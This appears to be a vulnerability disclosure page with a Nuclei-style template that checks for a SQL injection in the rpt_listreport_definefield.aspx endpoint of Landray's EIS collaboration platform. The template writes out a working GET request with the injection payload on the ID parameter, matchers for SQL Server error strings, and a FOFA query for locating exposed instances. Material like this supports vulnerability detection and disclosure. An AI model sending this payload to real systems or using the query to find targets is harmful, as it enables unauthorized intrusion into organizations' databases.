Landray's smart collaboration platform EIS has a very rich collection of modules to meet the needs of organizations and enterprises in knowledge, collaboration, and project management system construction. There is a SQL injection vulnerability in the rpt_listreport_definefield.aspx interface of Landray EIS smart collaboration platform
PoC代码[已公开]
id: landray-eis-sqli
info:
name: Landray EIS - SQL Injection
author: DhiyaneshDK
severity: high
description: |
Landray's smart collaboration platform EIS has a very rich collection of modules to meet the needs of organizations and enterprises in knowledge, collaboration, and project management system construction. There is a SQL injection vulnerability in the rpt_listreport_definefield.aspx interface of Landray EIS smart collaboration platform
reference:
- https://github.com/wy876/POC/blob/main/%E8%93%9D%E5%87%8CEIS%E6%99%BA%E6%85%A7%E5%8D%8F%E5%90%8C%E5%B9%B3%E5%8F%B0rpt_listreport_definefield.aspx%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1
classification:
cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: landray
product: landray_office_automation
fofa-query: app="Landray-OA系统"
tags: landray,eims,sqli,vuln
http:
- method: GET
path:
- "{{BaseURL}}/SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+"
matchers:
- type: word
words:
- "Microsoft SQL Server"
- "SqlException"
condition: and
# digest: 4b0a004830460221009ab658b68fcd66a54c959d78700ffef26249478d813dc63674ea38cba7a1e705022100ee95de74c5ed8bed8821e4074866ae2206ed14d6e4704fa6fe2807319b0291e7:922c64590222798bb761d5b6d8e72950